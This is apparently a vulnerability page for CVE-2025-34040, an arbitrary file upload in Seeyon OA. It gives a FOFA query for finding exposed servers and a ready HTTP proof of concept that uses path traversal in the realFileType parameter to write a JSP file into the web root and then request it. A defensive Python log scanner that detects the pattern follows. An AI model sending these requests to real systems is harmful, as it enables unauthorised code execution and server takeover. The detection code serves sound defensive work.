# Seeyon OA file upload leading to RCE (CVE-2025-34040)

Seeyon OA has an arbitrary file upload vulnerability that can be used to gain control of the server.

## fofa

```
app="致远互联-OA" && title="V8.0SP2"
```

## poc

In the request below, the `realFileType` parameter carries a `../` traversal path that points into the web root, so the uploaded content is saved as `Hello.jsp`.

```http
POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/Hello.jsp&fileId=2 HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
Accept-Encoding: gzip

--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="upload"; filename="123.xls"
Content-Type: application/vnd.ms-excel

<% out.println("HelloWorld");%>
--59229605f98b8cf290a7b8908b34616b--
```

Request the uploaded file:

```http
GET /Hello.jsp HTTP/1.1
Host: 
```
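A defender-side check for the request pattern above, as an added example that is not part of the original page: it flags access-log lines where a request to `wpsAssistServlet` carries a `realFileType` value containing path traversal or a JSP extension. The log lines are constructed, and the combined log format and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (combined log format assumed), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jul/2025:10:00:01 +0800] "POST /seeyon/wpsAssistServlet?flag=save'
    '&realFileType=../../../../ApacheJetspeed/webapps/ROOT/Hello.jsp&fileId=2 HTTP/1.1" 200 15',
    '10.0.0.6 - - [01/Jul/2025:10:00:07 +0800] "POST /seeyon/wpsAssistServlet?flag=save'
    '&realFileType=%252e%252e%252fx.jspx&fileId=3 HTTP/1.1" 200 15',
    '10.0.0.7 - - [01/Jul/2025:10:01:30 +0800] "POST /seeyon/wpsAssistServlet?flag=save'
    '&realFileType=.xls&fileId=4 HTTP/1.1" 200 15',
    '10.0.0.8 - - [01/Jul/2025:10:02:00 +0800] "GET /seeyon/main.do?method=main HTTP/1.1" 200 5120',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
SCRIPT_EXTENSIONS = (".jsp", ".jspx")


def fully_unquote(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252e -> %2e -> .)."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def check_line(line):
    """Return the reasons a log line matches the upload pattern ([] if none)."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    url = urlsplit(match.group("target"))
    # Drop any ";jsessionid=..." path parameter before comparing the servlet name.
    if not url.path.split(";")[0].lower().endswith("/wpsassistservlet"):
        return []
    reasons = []
    for raw in parse_qs(url.query, keep_blank_values=True).get("realFileType", []):
        value = fully_unquote(raw).replace("\\", "/")
        if "../" in value or value.startswith("/"):
            reasons.append("path traversal in realFileType")
        if value.lower().rstrip("/. ").endswith(SCRIPT_EXTENSIONS):
            reasons.append("server-side script extension in realFileType")
    return reasons


def scan(lines):
    """Return (line_number, reasons) for every suspicious line."""
    return [(n, r) for n, line in enumerate(lines, 1) if (r := check_line(line))]
```

A match in the logs only shows an attempt; confirm by checking the web root for unexpected `.jsp` files created around the same time.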